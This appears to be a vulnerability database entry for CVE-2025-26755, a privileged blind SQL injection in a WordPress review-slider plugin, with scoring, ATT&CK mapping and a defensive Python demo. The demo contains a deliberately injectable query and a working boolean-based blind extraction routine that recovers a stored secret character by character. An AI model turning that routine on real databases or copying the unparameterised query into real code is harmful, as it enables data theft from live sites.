CVE-2025-26755
Published: 16 February 2025
Description
Adversaries may leverage databases to mine valuable information (the MITRE ATT&CK description of T1213.006, Data from Information Repositories: Databases, which is the collection technique this vulnerability enables).
Security Summary
CVE-2025-26755 is an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability (CWE-89) that enables Blind SQL Injection in the WP Airbnb Review Slider plugin (wp-airbnb-review-slider) developed by jgwhite33 for WordPress. The flaw affects all versions of the plugin from its initial release through 3.9 inclusive. Published on 2025-02-16, it carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L).
Exploitation requires network access, low attack complexity and high privileges (PR:H): in WordPress terms, an authenticated account with an elevated role such as Administrator. No user interaction is needed. A successful attacker can read sensitive data from the database through boolean- or time-based blind SQL injection (C:H), cannot modify data through this flaw (I:N), and causes at most a minor availability impact (A:L). The scope is changed (S:C) because the injected SQL runs against the shared WordPress database, so the impact reaches beyond the plugin's own tables to everything the site's database user can read. Because a high-privilege account is already required, the practical risk comes from compromised or malicious privileged accounts; the fix still matters, since the flaw turns such an account into an arbitrary database read primitive.
The Patchstack advisory provides further details on this vulnerability in the WP Airbnb Review Slider plugin up to version 3.9, available at https://patchstack.com/database/Wordpress/Plugin/wp-airbnb-review-slider/vulnerability/wordpress-wp-airbnb-review-slider-plugin-3-9-sql-injection-vulnerability?_s_id=cve.
Details
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
MITRE ATT&CK Enterprise Techniques
Why these techniques?
An SQL injection in a publicly reachable WordPress plugin maps to T1190 (Exploit Public-Facing Application) for the exploitation step, with the caveat that PR:H means the attacker must first hold a high-privilege WordPress account, and to T1213.006 (Data from Information Repositories: Databases) for the collection step, since blind SQL injection lets the attacker read arbitrary database contents one true/false answer at a time and exfiltrate them.
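To make both the blind extraction described in the Security Summary and the T1213.006 collection mapping concrete, here is an added example; it is not code from the plugin, from Patchstack, or from this page. It models a hypothetical review-count query against an in-memory SQLite database: the table and column names, the option name and the secret value are constructed for illustration and are not the plugin's real schema or its vulnerable parameter, which this page does not identify. The vulnerable function interpolates a request value into SQL the way CWE-89 code does; the hardened one binds it as a parameter (the $wpdb->prepare() equivalent in WordPress). extract_option() then runs a boolean-based blind attack that recovers a wp_options value character by character using only "did any rows match" as its oracle, and shows that the same attack recovers nothing against the parameterised query.

```python
import sqlite3

# Constructed in-memory stand-in for a WordPress database. Table and column
# names, the option name and the secret are assumptions for illustration,
# not the real plugin's schema.
SETUP_SQL = """
CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
INSERT INTO wp_options VALUES ('airbnb_api_secret', 's3cr3t-k3y');
CREATE TABLE wp_airbnb_reviews (id INTEGER, reviewer TEXT, rating INTEGER);
INSERT INTO wp_airbnb_reviews VALUES (1, 'Ana', 5), (2, 'Ben', 4);
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SETUP_SQL)
    return conn


def count_reviews_vulnerable(conn, rating):
    """Assumed vulnerable pattern (CWE-89): the request value is pasted into SQL."""
    sql = f"SELECT COUNT(*) FROM wp_airbnb_reviews WHERE rating = {rating}"
    return conn.execute(sql).fetchone()[0]


def count_reviews_hardened(conn, rating):
    """Hardened form: the value travels as a bound parameter, never as syntax.
    In WordPress the equivalent is $wpdb->prepare('... rating = %d', $rating)."""
    sql = "SELECT COUNT(*) FROM wp_airbnb_reviews WHERE rating = ?"
    return conn.execute(sql, (rating,)).fetchone()[0]


def extract_option(query_fn, conn, option_name, max_len=32):
    """Boolean-based blind extraction of one wp_options value.

    The only signal is whether the injected condition kept the matched row
    count above zero, so each character is recovered by binary search over
    its code point. Returns (recovered_value, number_of_queries_sent).
    """
    queries = 0
    target = f"(SELECT option_value FROM wp_options WHERE option_name = '{option_name}')"

    def oracle(condition):
        nonlocal queries
        queries += 1
        # rating 5 legitimately matches one row; AND (condition) keeps or drops it.
        return query_fn(conn, f"5 AND ({condition})") > 0

    value = ""
    for pos in range(1, max_len + 1):
        # Stop once the value has no character at this position.
        if not oracle(f"length({target}) >= {pos}"):
            break
        lo, hi = 0, 127  # assumes an ASCII secret; widen for UTF-8 targets
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({target}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value, queries


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_option(count_reviews_vulnerable, db, "airbnb_api_secret"))
    print("hardened:  ", extract_option(count_reviews_hardened, db, "airbnb_api_secret"))
```

Against the vulnerable query the attack recovers the whole secret with about eight requests per character (one length probe plus seven comparisons); against the parameterised query the very first probe fails because the payload is compared as a literal string, not executed. That request volume is also the detection angle: a burst of near-identical requests from a single authenticated privileged account, differing only in a numeric comparison, is the log signature of boolean-based blind SQL injection.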